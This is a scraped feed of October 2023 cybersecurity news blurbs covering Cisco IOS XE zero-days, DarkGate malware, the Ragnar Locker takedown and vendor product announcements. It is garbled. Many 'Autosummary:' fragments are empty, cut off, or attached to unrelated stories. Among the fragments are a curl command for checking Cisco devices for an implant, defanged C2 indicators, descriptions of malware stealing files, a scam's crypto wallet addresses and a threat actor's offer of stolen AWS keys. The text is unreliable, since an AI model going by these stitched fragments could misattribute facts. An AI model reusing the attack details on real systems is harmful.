New enterprise service management solution packages Based on business needs and scalability, Ivanti is offering four enterprise service management solution packages: ITSM Professional, ITSM Enterprise, ITSM Premium, and ITSM Enterprise Premium. "Semperis announced a global relationship with Veritas Technologies to protect enterprises’ most critical assets and identity systems from cyberattacks. The powerful combination of Semperis Active Directory Forest Recovery (ADFR) and Veritas NetBackup provides enterprises with a comprehensive solution to guard against, and recover from, cyberattacks on Microsoft Active Directory (AD) systems. Microsoft AD, the primary identity system and backbone of IT operations for 90 percent of organizations, is a common target for ransomware operators and … More
The post Semperis and Veritas defend enterprises against cyberattacks on Microsoft AD systems appeared first on Help Net Security.
"Autosummary:
The joint solution delivers protection and recovery for AD environments, including: A blueprint for inventorying, classifying, and monitoring data with Veritas 360 Defense to protect it from cyberattacks Anomaly detection and virus scanning through Veritas NetBackup to ensure data is virus-free before recovery Fast, automated, malware-free recovery of the entire AD forest to any virtual or physical hardware with Semperis ADFR in the event of an attack that compromises AD Post-breach forensics with Semperis ADFR to help incident response teams eliminate backdoors, attack paths, and other vulnerabilities remaining in the environment “Veritas and Semperis are industry leaders in data protection and AD security and recovery, respectively,” added Mar-Elia. "Autosummary:
"Autosummary:
Also delivered after a series of undetermined steps is a Binary Validator, a Mach-O binary file that carries out the below operations - Remove crash logs from the /private/var/mobile/Library/Logs/CrashReporter directory to erase traces of possible exploitation Delete evidence of the malicious iMessage attachment sent from 36 different attacker-controlled Gmail, Outlook, and Yahoo email addresses Obtain a list of processes running on the device and the network interfaces Check if the target device is jailbroken Turn on personalized ad tracking Gather information about the device (username, phone number, IMEI, and Apple ID), and Retrieve a list of installed apps "What is interesting about these actions is that the validator implements them both for iOS and macOS systems," the researchers said, adding the results of the aforementioned actions are encrypted and exfiltrated to a command-and-control (C2) server to fetch the TriangleDB implant. "Autosummary:
The threat actors claimed to have stolen 32 GB of data, including the personal data of players, passports and ID cards, and many documents relating to finance, taxation, and legal matters. "Autosummary:
The first (CVE-2022-31706) is a directory traversal bug, the second (CVE-2022-31704) is a broken access control flaw, while the third, an information disclosure bug (CVE-2022-31711), allows attackers to gain access to sensitive session and application info, Attackers can chain these vulnerabilities (collectively tracked as VMSA-2023-0001 by VMware) to inject maliciously crafted files into the operating system of VMware appliances running unpatched Aria Operations for Logs software. "Autosummary:
The most targeted sectors were "industrials" (construction, engineering, commercial services) with 169 attacks, "consumer cyclicals" (retail, media, hotels) with 94, technology (software and IT services, networking, telecommunications) with 52, and healthcare with 38. "Versa Networks announced Versa Secure SD-LAN, a software-defined branch and campus Local Area Network (LAN) solution to deliver zero trust and IoT security natively at the LAN Edge. This software-defined approach makes campus and branch networks more agile and integrated, and zero trust improves the security posture. For years, enterprises have grappled with the limitations and vendor lock-in from traditional LAN solutions. Legacy LAN architectures create painful operational challenges and cannot meet the evolving business … More
The post Versa Secure SD-LAN delivers zero trust and IoT security appeared first on Help Net Security.
"Autosummary:
Ethernet switches that deliver line rate L2, L3, VXLAN, and L4-7 security including firewall, application identification, adaptive micro-segmentation, IoT fingerprinting, and inline ZTNA.Pre-emptively adjusts traffic paths in real-time, automates troubleshooting, optimizes operations, reduces network downtime, and improves predictability.Converges routing, SD-WAN, SD-LAN, and security into a single branch appliance to deliver simplified management and lower Total Cost of Ownership (TCO). "Veeam Software announced a strategic partnership with Sophos. Through the partnership, Veeam Data Platform will integrate with Sophos Managed Detection and Response (MDR), adding a critical layer of human-led threat detection and response to advance the security of business-critical backups against ransomware attackers who attempt to manipulate, delete or change the customers backup environment as a tactic in their overall attack chain to increase pressure on victims to pay the ransom. With persistent cyberattackers constantly … More
The post Veeam and Sophos partner to help organizations detect cybersecurity threats appeared first on Help Net Security.
"Autosummary:
Should a threat be identified, such as an attacker attempting to tamper with backups, Veeam sends an alert to Sophos MDR—a fully-managed threat hunting, detection and response service that provides a dedicated 24/7 security team that rapidly identifies and neutralizes complex attacks, including ransomware, network breaches, hands-on keyboard adversaries, and more. "Autosummary:
Search disk for files of specific extensions (.doc, .docx, .pdf, .xls, .xlsx, .ppt, .pptx, .zip, .rar, .7z, .odt, .ods, .kdbx, .ovpn, .pem, .crt, .key) and transfer them to the C2. "Autosummary:
TransForm is a not-for-profit, shared service organization founded by five hospitals in Erie St. Clair, Ontario, to manage their IT, supply chain, and accounts payable. "Autosummary:
"VMware is aware of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass flaw in VMware Aria Operations for Logs. VMware warned customers of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass vulnerability, tracked as CVE-2023-34051, in VMware Aria Operations for Logs (formerly known as vRealize Log Insight). The […]
The post Experts released PoC exploit code for VMware Aria Operations for Logs flaw. Patch it now! appeared first on Security Affairs.
"Autosummary:
VMware warned customers of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass vulnerability, tracked as CVE-2023-34051, in VMware Aria Operations for Logs (formerly known as vRealize Log Insight). "Autosummary:
"Autosummary:
"Autosummary:
"Escalating threats to operational technology (OT) have prompted an increasing number of global enterprises to adopt sophisticated technologies and services to enhance the security of their assets. In this Help Net Security video, Christopher Warner, Senior GRC-OT Security Consultant at GuidePoint Security, discusses securing the control systems environment, as well as creating a cybersecurity roadmap. OT necessitates a systematic approach. Unique characteristics, such as the importance of safety and the critical nature of system uptime, … More
The post Navigating OT/IT convergence and securing ICS environments appeared first on Help Net Security.
"Autosummary:
"Healthcare organizations have become prime targets for cybercriminals due to the immense value of their data, including patient records, sensitive medical information, and financial data. The importance of protecting this invaluable information, alongside ensuring the seamless operation of medical devices and essential systems, has never been more critical. In this Help Net Security round-up, we present segments from previously recorded videos in which security experts discuss the vulnerabilities and gaps in healthcare cybersecurity. Complete videos … More
The post Cyberattacks put healthcare organizations on high alert appeared first on Help Net Security.
"Autosummary:
"Researchers linked Vietnamese threat actors to the string of DarkGate malware attacks on entities in the U.K., the U.S., and India. WithSecure researchers linked the recent attacks using the DarkGate malware to a Vietnamese cybercrime group previously known for the usage of Ducktail stealer. DarkGate is a commodity malware that is offered with a model […]
The post Vietnamese threat actors linked to DarkGate malware campaign appeared first on Security Affairs.
"Autosummary:
Vietnamese threat actors linked to DarkGate malware campaign Pierluigi Paganini October 23, 2023 October 23, 2023 Researchers linked Vietnamese threat actors to the string of DarkGate malware attacks on entities in the U.K., the U.S., and India. "Autosummary:
"Cisco has released the first fixes for the IOS XE zero-day (CVE-2023-20198) exploited by attackers to ultimately deliver a malicious implant. The fixes were made available on Sunday, but a curious thing happened the day before: several cybersecurity companies and organizations have noticed a drastic reduction in the number of internet-facing Cisco devices that saddled with the implant. The reason behind that change is still unclear, but several theories have been put forward. The attackers … More
The post “Disappearing” implants, followed by first fixes for exploited Cisco IOS XE zero-day appeared first on Help Net Security.
"Autosummary:
The attackers leveraged two zero-days (CVE-2023-20273) On October 16, Cisco revealed that attackers have been spotted exploiting one previously unknown vulnerability (CVE-2023-20198) and an older one (CVE-2021-1435) in the web UI of Cisco IOS XE software to create highest-privilege accounts and install an implant/backdoor on internet-facing network devices. "Autosummary:
An investigation concluded on September 1, 2023, indicates that the following data was stolen: Full name Date of birth Social Security Number (SSN) Health information At the time of writing this, Akira ransomware has not leaked any data belonging to BHI on its extortion portal on the dark web, and neither have the cybercriminals announced BHI in their upcoming data leaks. "Autosummary:
"Autosummary:
On Cisco devices, permissions to issue commands are locked into levels from zero to 15, with zero providing five basic commands (“logout,” “enable,” “disable,” “help,” and “exit”) and 15 being the most privileged level that provides complete control over the device. Count of hacked Cisco IOS XE devices plummets source: The ShadowServer Foundation The reason for the sudden low number could also be that a grey-hat hacker has been automatically rebooting infected devices to remove the malicious implant. "Centific and Prove Identity have partnered to bridge the gap between cybersecurity and fraud protection. This initiative will redefine the digital security landscape by offering a holistic solution for ensuring data privacy, identity verification, and digital fraud protection that protects businesses and their customers while also enhancing customer experiences. This joint effort by Centific and Prove Identity aims to provide a one-stop-shop for businesses looking to enhance digital security while providing safe and seamless customer … More
The post Centific and Prove Identity partner to bridge cybersecurity and fraud protection gap appeared first on Help Net Security.
"Autosummary:
"Jumio unveiled Jumio 360° Fraud Analytics, its new fraud-fighting technology that uses AI-driven predictive analytics to identify fraud patterns with more sophistication and accuracy. According to Jumio’s analysis, 25% of fraud is interconnected — either perpetrated by fraud rings or by individuals using the same information or credentials to open new accounts on banking sites, ecommerce platforms, sharing economy sites and more. A single organized crime operation or fraud ring can cause damage into the … More
The post Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities appeared first on Help Net Security.
"Autosummary:
Key features include: Graph database technology and machine learning classify identity transactions into clusters based on behavioral similarities, which is especially powerful for identifying fraud rings AI-driven predictive analytics determine the likelihood of fraud risk for each identity transaction based on its cluster association The predictive fraud score can be used to automatically reject identity transactions, stopping fraudsters from accessing your platform in real time Dashboards provide transparency and help you visualize connected data Jumio 360° Fraud Analytics is currently available in early release to select customers and will be generally available in early 2024. "The City of Philadelphia discloses a data breach that resulted from a cyber attack that took place on May 24 and that compromised City email accounts. The City of Philadelphia announced it is investigating a data breach after attackers that threat actors broke some of City email accounts containing personal and protected health information. The […]
The post City of Philadelphia suffers a data breach appeared first on Security Affairs.
"Autosummary:
Exposed information varies by individual and can include demographic information (i.e. name, address, date of birth, social security number, and other contact information), medical information (i.e. diagnosis and other treatment-related information), and limited financial information, such as claims information. "Autosummary:
"Autosummary:
"For instance, they use various call-to-donate phrases like "we call to your compassion and benevolence" or "we call to your empathy and generosity," and substitute words like "help" with synonyms such as "support," "aid," etc. "Aid Gaza" support page lists Bitcoin, Ethereum, USDT wallet addresses BTC: 16gbXTmvxtrzieoh2vX3io7FhXK4WJryX2 ETH: 0x5E8b0df880A9f9F6e4D4090a84b3c1A02fF311b4 USDT: TK4A9dfwqbJhzz4NeGJZBo9nVMJztxnT27 Fortunately, BleepingComputer tracked the crypto addresses" transaction history and observed no donations have been sent yet to any of these addresses. "AidGaza" website and social media accounts claim that it provides humanitarian aid (BleepingComputer) The operators behind this account have listed their Ethereum, Bitcoin, and USDT addresses on its website and social media accounts [1, 2] where funds should be sent. "Autosummary:
"Cisco found a second IOS XE zero-day vulnerability, tracked as CVE-2023-20273, which is actively exploited in attacks in the wild. Cisco last week warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. The IT giant found the vulnerability during the resolution of multiple Technical Assistance […]
The post Cisco warns of a second IOS XE zero-day used to infect devices worldwide appeared first on Security Affairs.
"Autosummary:
Cisco warns of a second IOS XE zero-day used to infect devices worldwide Pierluigi Paganini October 23, 2023 October 23, 2023 Cisco found a second IOS XE zero-day vulnerability, tracked as CVE-2023-20273, which is actively exploited in attacks in the wild. Thursday 10/19 4pm CET (cleaning step began): 31 220 Today 10/22 5pm CET: 320#CVE-2023-20198 #CVE-2023-20273 #somethingishappening pic.twitter.com/mh1ugFAfOf — CERT Orange Cyberdefense (@CERTCyberdef) October 22, 2023 At the time of this publishing, it is still unclear who is behind these attacks. "US CISA added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The vulnerability is an unspecified issue in the web user interface. An attacker can chain this flaw with CVE-2023-20198 to leverage the new […]
The post CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 23, 2023 October 23, 2023 US CISA added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. "Categories: Business On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network. |
The post Battling a new DarkGate malware campaign with Malwarebytes MDR appeared first on Malwarebytes Labs.
"Autosummary:
Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/ Get a Malwarebytes MDR quote Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks: Tracking down a trojan: An inside look at threat hunting in a corporate network Understanding ransomware reinfection: An MDR case study Indicators of Compromise (IoC) File Details: Filename: C_onfidential Sign_ificant Company Changes.zip Reported At: 09/13/2023 9:57:56 AM Network Indicators: C2 IP Address: 5[.]188[.]87[.]58 Malicious URLs: "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: North Korean hackers are targeting software developers and impersonating IT workers State-sponsored North Korean hackers have significantly intensified their focus on the IT sector in recent years, by infiltrating firms developing software and companies lookind for IT workers. The collaborative power of CISOs, CTOs and CIOs for a secure future In this Help Net Security interview, Phil Venables, CISO at … More
The post Week in review: Cybersecurity cheat sheets, widely exploited Cisco zero-day, KeePass-themed malvertising appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Admiral James A. Winnefeld, advisor to Acalvio Technologies, compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. New infosec products of the week: October 20, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Arcitecta, AuditBoard, BackBox, Prevalent, and Thales.Net Security interview, Phil Venables, CISO at Google Cloud, discusses the results of a recent Google report on board collaboration with the C-suite — particularly the CIO, CTO, and CISO to stay current with trends and prioritize security, rather than treating it as an afterthought. "Autosummary:
"Autosummary:
"Autosummary:
The effort is the latest coordinated exercise involving authorities from Czechia, France, Germany, Italy, Japan, Latvia, the Netherlands, Spain, Sweden, Ukraine, and the U.S. Two suspects associated with the ransomware crew were previously arrested from Ukraine in 2021. "Autosummary:
If you have any information regarding the American Family Insurance cyberattack, you can contact us confidentially via Signal at 646-961-3731 IT systems shut down after cyberattack Since this past weekend, American Family Insurance has suffered IT outages impacting the company"s phone service, building connectivity, and online services. "Autosummary:
Finally, cybersecurity researchers released interesting reports on ransomware, including: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @serghei, @fwosar, @Ionut_Ilascu, @billtoulas, @Seifreed, @demonslay335, @malwrhunterteam, @BleepinComputer, @vx_herm1t, @AlvieriD, @AShukuhi, @pcrisk, @rivitna2, @BushidoToken, @ResilienceSays, @SophosXOps, @Unit42_Intel, @jgreigj, @azalsecurity, @AShukuhi, @Cynet360, @FalconFeedsio, and @cyber_int. On Thursday, the RagnarLocker data leak site and negotiation site also began to show a new message, this time a seizure banner by law enforcement from France, the Czech Republic, Germany, Italy, Latvia, the Netherlands, Spain, Sweden, Japan, Canada, and the United States. "Autosummary:
In the U.S., many of the devices are from communications providers such as Comcast, Verizon, Cox Communications, Frontier, AT&T, Spirit, CenturyLink, Charter, Cobridge, Windstream, and Google Fiber. "Financial services organizations are enticing targets for cybercriminals due to their significant wealth holdings, presenting abundant opportunities for monetary gain through extortion, theft, and fraud, according to Trustwave. In addition to the money itself, the financial services sector stores large volumes of sensitive data, including customer information, financial records, and intellectual property. “In a highly competitive B2B and B2C financial services industry, cybersecurity’s role earning and sustaining consumer trust is paramount as a competitive differentiator,” … More
The post The double-edged sword of heightened regulation for financial services appeared first on Help Net Security.
"Autosummary:
The financial services industry holds a vast amount of sensitive customer data, including names, addresses, Social Security numbers, bank account numbers, and credit card numbers, making the sector a high-value target. "The financial constraints many smaller organizations face often cast shadows on their ability to fortify defenses. In this Help Net Security interview, Brent Deterding, CISO at Afni, delves into the realities and myths surrounding the cybersecurity poverty line, exploring the role of budget, knowledge, and leadership. Challenging popular notions and offering actionable insights, Deterding reveals how organizations can rise above financial limitations to safeguard their digital assets effectively. An organization’s modest budget restricts it from … More
The post The real impact of the cybersecurity poverty line on small organizations appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Brent Deterding, CISO at Afni, delves into the realities and myths surrounding the cybersecurity poverty line, exploring the role of budget, knowledge, and leadership.That said, I don’t believe people, processes, or technology are limiting factors because significant risk reduction is simple (technology), easy (people/process), and cheap. "WithSecure researchers have tracked attacks using DarkGate malware to an active cluster of cybercriminals operating out of Vietnam. DarkGate is a remote access trojan (RAT) that has been used in attacks since at least 2018 and is currently available to cybercriminals as Malware-as-a-Service (MaaS). It has a diverse user base and a variety of capabilities. It has been observed in information stealing, cryptojacking, and ransomware campaigns. WithSecure researchers began their investigation into DarkGate after detecting … More
The post Researchers uncover DarkGate malware’s Vietnamese connection appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"More than 40,000 Cisco IOS XE devices have been compromised in attacks exploiting recently disclosed critical vulnerability CVE-2023-20198. Researchers from LeakIX used the indicators of compromise (IOCs) released by Cisco Talos and found around 30k Cisco IOS XE devices (routers, switches, VPNs) that were infected by exploiting the CVE-2023-20198. Most of the infected devices were […]
The post Tens of thousands Cisco IOS XE devices were hacked by exploiting CVE-2023-20198 appeared first on Security Affairs.
"Autosummary:
Researchers from LeakIX used the indicators of compromise (IOCs) released by Cisco Talos and found around 30k Cisco IOS XE devices (routers, switches, VPNs) that were infected by exploiting the CVE-2023-20198.This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.” "Autosummary:
With a workforce exceeding 35,000 employees, Kwik Trip also manages stores under various banners, including Tobacco Outlet Plus, Tobacco Outlet Plus Grocery, Hearty Platter, Kwik Spirits, and Stop-N-Go. "Autosummary:
Targets are tricked into downloading malicious files from a URL(“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Salary and new products.8.4.zip”) with a PDF or DOCX document and a TXT file with thefollowing names: Job Description of Corsair.docx Salary and new products.txt PDF Salary and Products.pdf WithSecure researchers analyzed the metadata for the above files and found leads to RedLine stealer distribution. "NetSPI unveiled enhancements to its social engineering penetration testing solutions to help organizations build resilience to modern-day phishing attacks. The updates bring a customized, contextual approach to social engineering testing and go beyond basic phishing campaigns to simulate advanced techniques such as device code and OAuth application phishing and capturing multi-factor authentication tokens. NetSPI has identified opportunities to update its processes and tooling to create efficiencies, cost savings, and scalability. The phishing tests follow NetSPI’s … More
The post NetSPI boosts phishing resilience with enhanced social engineering penetration testing appeared first on Help Net Security.
"Autosummary:
"ABS Consulting and Dragos have expanded their strategic partnership to provide operational technology (OT) cybersecurity solutions, services and training to federal and commercial organizations. This strategic partnership will build on the companies’ existing work together, further integrating Dragos’ OT cybersecurity technology with ABS Consulting’s OT risk management expertise to address the market-wide demand for a comprehensive, well-resourced approach to cyber defense. “As cyber attacks on critical industries become more frequent and severe, securing the facilities … More
The post ABS Consulting and Dragos boost OT cybersecurity partnership for federal and commercial sectors appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"US CISA added the vulnerability CVE-2021-1435 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2021-1435 in Cisco IOS XE. The vulnerability is a command injection vulnerability in the web user interface that could allow a remote, authenticated attacker to inject commands that can be executed as the root […]
The post CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 20, 2023 October 20, 2023 US CISA added the vulnerability CVE-2021-1435 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. "Autosummary:
This joint operation between authorities from France, the Czech Republic, Germany, Italy, Latvia, the Netherlands, Spain, Sweden, Japan, Canada, and the United States marks the third action against the same ransomware gang. "Autosummary:
One way to detect the malicious implant on compromised Cisco IOS XE devices requires running the following command on the device, where the placeholder "DEVICEIP" represents the IP address under investigation: curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1" Last month, Cisco warned customers to patch another zero-day bug (CVE-2023-20109) in its IOS and IOS XE software, also targeted by attackers in the wild "A joint international law enforcement investigation led to the arrest of a malware developer who was involved in the Ragnar Locker ransomware operation. Yesterday we became aware of a joint law enforcement operation that led to the seizure of the Ragnar Locker ransomware’s infrastructure. The police on Thursday seized the Tor negotiation and data leak sites, group’s […]
The post Alleged developer of the Ragnar Locker ransomware was arrested appeared first on Security Affairs.
"Autosummary:
Alleged developer of the Ragnar Locker ransomware was arrested Pierluigi Paganini October 20, 2023 October 20, 2023 A joint international law enforcement investigation led to the arrest of a malware developer who was involved in the Ragnar Locker ransomware operation. "Categories: News Categories: Ransomware Tags: ragnar locker Tags: europol Tags: eurojust One of the oldest active ransomware gangs has been taken down by an international cooperation of law enforcement agencies |
The post Ragnar Locker ransomware group taken down appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Posted: October 20, 2023 by One of the oldest active ransomware gangs has been taken down by an international cooperation of law enforcement agencies Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. Ragnar Locker"s known attacks by industry sector, October 2022 - September 2023 In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors. "Autosummary:
"Autosummary:
"Over 80% of northern European organizations emphasize that the need to ensure business resilience is the top driver for their cybersecurity investments, according to Nixu. The report reveals both encouraging progress and increasing concerns. Alarmingly, 50% of organizations reach only a poor or deficient level in cybersecurity. “The prominence of business resilience as a driver for cybersecurity investments highlights the increasing awareness of the need to protect operations and ensure continuity. Overall, the Nixu report … More
The post Business resilience becomes primary force behind cybersecurity investments appeared first on Help Net Security.
"Autosummary:
Through better security monitoring, organizations are able to detect early indications of attacks, and with more sophisticated response capabilities, organizations can limit the impact of any incident,” says Jan Mickos, Nixu’s SVP and Service Area Lead of Managed Services. To solve the serious issues of managing competences and ensuring resilience, the report recommends consistent cybersecurity management, investing in risk management, and complementing internal operations with an external service delivery capabilities partner. "It’s always DNS. That’s what the famous internet meme popular among sysadmins says anyway. It’s funny because while clearly, every network issue doesn’t resolve to some funky DNS issue, too many network admins have banged their heads against their keyboard for hours only to find out that the culprit was indeed some DNS issue. Yes, it might not always be DNS, but when it comes to cyberattacks, it is too often the network. Example: In … More
The post Reinforcing cybersecurity: The network’s role to prevent, detect, and respond to attacks appeared first on Help Net Security.
"Autosummary:
But to give you an idea of how to use the framework, I’ll give you a few questions to ask your network team to determine your level of organization maturity in each area: Prevent: Does our network monitoring include only IP, port, and protocol tracking? I sum up the organization network security triad as such: Prevent : Reduce the likelihood of a full-blown attack before it happens : Reduce the likelihood of a full-blown attack before it happens Detect : Mitigate attacks faster when they do occur :Prevent, detect, respond I believe the key to better network security can be summed up with the triad of Prevent, Detect, and Respond. "Autosummary:
"We certainly believe that North Korean hacking of cryptocurrency around infrastructure, around the world – including in Singapore, Vietnam, and Hong Kong – is a major source of revenue for the regime that"s used to finance the advancing of the missile program and the far greater number of launches we have seen in the last year," U.S. Deputy National Security Advisor, Anne Neuberger, said. "Autosummary:
"Google TAG reported that both Russia and China-linked threat actors are weaponizing the a high-severity vulnerability in WinRAR. Google’s Threat Analysis Group (TAG) reported that in recent weeks multiple nation-state actors were spotted exploiting the vulnerability CVE-2023-38831 in WinRAR. The researchers reported that several cybercrime groups began exploiting the flaw in early 2023, when the […]
The post Multiple APT groups exploited WinRAR flaw CVE-2023-38831 appeared first on Security Affairs.
"Autosummary:
Multiple APT groups exploited WinRAR flaw CVE-2023-38831 Pierluigi Paganini October 19, 2023 October 19, 2023 Google TAG reported that both Russia and China-linked threat actors are weaponizing the a high-severity vulnerability in WinRAR. "Autosummary:
If anyone wants the AWS keys (with some pretty juicy permissions, S3 bucket access, etc.) and database credentials, etc., DM me," the threat actor said. "Unless you have lived under a rock for the past year, you know that generative artificial intelligence applications, such as ChatGPT, have penetrated many aspects of our online lives. From generating marketing content, creating images for advertisements and blogs, or even writing malicious code, we are all interacting with the results of generative AI in some ways daily. So, when I was thinking about writing about 2024 predictions, I thought, why not give Gen AI … More
The post 2024 cybersecurity predictions: GenAI edition appeared first on Help Net Security.
"Autosummary:
While eliminating the potential of an attack is unrealistic, ensuring proper network segmentation, adopting new automation capabilities regarding security analytics, and (yes, again) proper cybersecurity training for everyone, including contractors, can go a long way.The fact of the matter, though, is that no one knows what the new year has to offer, aside from the fact that attackers will continue to attack, defenders will continue to defend, and vendors and service providers will be here to help.AI-powered attacks may include more convincing phishing attempts, automated malware creation, evasion of security measures, and personalized social engineering attacks, making it harder for traditional defense mechanisms to detect and prevent them. While that attack was a wake-up call for many organizations to be more vigilant regarding their network segmentation, third-party access, and more, only some have taken the appropriate steps to ensure they are protected from a similar attack. "Users using Google to search for and download the KeePass password manager and the Notepad++ text editor may have inadvertently gotten saddled with malware, says Jérôme Segura, Director of Threat Intelligence at Malwarebytes. Malvertising via search engine ads is a constant, evolving threat that seemingly never goes away and, according to Malwarebytes, it’s ramping up again. “Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types … More
The post Google ads for KeePass, Notepad++ lead to malware appeared first on Help Net Security.
"Autosummary:
Malvertising via search engine ads is a constant, evolving threat that seemingly never goes away and, according to Malwarebytes, it’s ramping up again. "Autosummary:
"North Korea-linked threat actors are actively exploiting a critical vulnerability CVE-2023-42793 in JetBrains TeamCity. Microsoft warns that North Korea-linked threat actors are actively exploiting a critical security vulnerability, tracked as CVE-2023-42793 (CVSS score: 9.8), in JetBrains TeamCity. CVE-2023-42793 is an authentication bypass issue affecting the on-premises version of TeamCity. An attacker can exploit the flaw to steal […]
The post North Korea-linked APT groups actively exploit JetBrains TeamCity flaw appeared first on Security Affairs.
"Autosummary:
North Korea-linked APT groups actively exploit JetBrains TeamCity flaw Pierluigi Paganini October 19, 2023 October 19, 2023 North Korea-linked threat actors are actively exploiting a critical vulnerability CVE-2023-42793 in JetBrains TeamCity. Microsoft warns that North Korea-linked threat actors are actively exploiting a critical security vulnerability, tracked as CVE-2023-42793 (CVSS score: 9.8), in JetBrains TeamCity. "Autosummary:
BleepingComputer has confirmed that visiting either website now displays a seizure message stating that a large assortment of international law enforcement from the US, Europe, Germany, France, Italy, Japan, Spain, Netherlands, Czech Republic, and Latvia were involved in the operation. "AuditBoard revealed powerful new capabilities purpose-built to enable teams to automate critical workflows, surface key strategic insights, and stay on top of proliferating risks. These new platform enhancements further deliver on the promise of AuditBoard’s modern connected risk model, which leverages innovative, purpose-built solutions to help teams surface and manage more risk, work smarter with greater impact, and engage front-line stakeholders: AuditBoard AI: The rapid increase in the volume and velocity of risk and compliance … More
The post AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows appeared first on Help Net Security.
"Autosummary:
AuditBoard AI addresses this challenge by leveraging purpose-built, proprietary algorithms as well as the full spectrum of artificial intelligence technology, including generative AI, machine learning, and natural language processing to bring relevant insights, intelligent suggestions, and powerful automations across audit, risk, and compliance programs. "Autosummary:
The cross-platform MATA framework was first documented by the Russian cybersecurity company in July 2020, linking it to the prolific North Korean state-sponsored crew in attacks targeting various sectors in Poland, Germany, Turkey, Korea, Japan, and India since April 2018. "Autosummary:
Hackers won"t wait for your next scan One-off scans can be a simple "one-and-done" scan to prove your security posture to customers, auditors or investors, but more commonly they refer to periodic scans kicked off at semi-regular intervals – the industry standard has traditionally been quarterly. The simple truth is that new vulnerabilities are disclosed every day, so there"s always the potential for a breach, even more so if you"re often updating cloud services, APIs, and applications.Running thousands of checks, which include identifying misconfigurations, missing patches, and web layer issues, Intruder makes enterprise-grade vulnerability scanning easy and accessible to everyone. "Autosummary:
"Autosummary:
For example, "München" would be converted to "Mnchen-3ya," "α" would become "mxa," "правда" would be "80aafi6cg," and "도메인" would become "hq1bm8jm9l." Threat actors abuse Punycode to register domain names that appear similar to legitimate sites but with one character using unicode, to look slightly different. "Autosummary:
"Based on evidence gathered during Operation Chakra-II, law enforcement agencies internationally are being notified of details of identified victims, Shell companies, identified money mules, identified proceeds of crime, details of co-accused/ support elements for comprehensive action to dismantle these criminal networks," the CBI said. "Autosummary:
These scripts are listed below: Structure of the image"s filesystem Source: Unit 42 The "controller" uses the bundled configuration file, which provides access tokens, victim credentials, and authentication secrets, as well as configuration directives, folder and file blocklists, tasks to run, and hosts to target for encryption. "Categories: News Categories: Ransomware Tags: IT-SA Tags: ransomware Tags: AI Tags: ChatGPT Tags: NIS2 The major talking points IT-SA included ransomware, ChatGPT, and NIS2. |
The post The hot topics from Europe"s largest trade fair for IT security appeared first on Malwarebytes Labs.
"Autosummary:
Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most of them roughly fell into 3 categories: Ransomware, AI/ChatGPT, and NIS2. "Autosummary:
Why training matters According to Verizon, three-quarters (74%) of all global breaches over the past year include the “human element,” which in many cases meant error, negligence or users falling victim to phishing and social engineering.One is threats from public Wi-Fi hotspots that might expose mobile workers to adversary-in-the-middle (AitM) attacks, where hackers access a network and eavesdrop on data travelling between connected devices and the router, and “evil twin” threats where criminals set up a duplicate Wi-Fi hotspot masquerading as a legitimate one in a specific location.Consider the following: 1) BEC and phishing Business Email Compromise (BEC) fraud, which leverages targeted phishing messages, remains one of the highest-earning cybercrime categories out there. "There has been a 44% increase in organized ID fraud in North America compared to preceding quarters, according to AU10TIX. This upsurge is believed to be driven by the ongoing economic recovery and inflationary pressures, particularly in the US market, which are emboldening professional ID fraud syndicates. Fraudsters target Asia-Pacific region Amid this escalation, the Asia-Pacific region emerges as the leading target for fraudsters, with over 4% of transactions flagged as an ID fraud attack. … More
The post Generative AI merges with intelligent malware, threat level rises appeared first on Help Net Security.
"Autosummary:
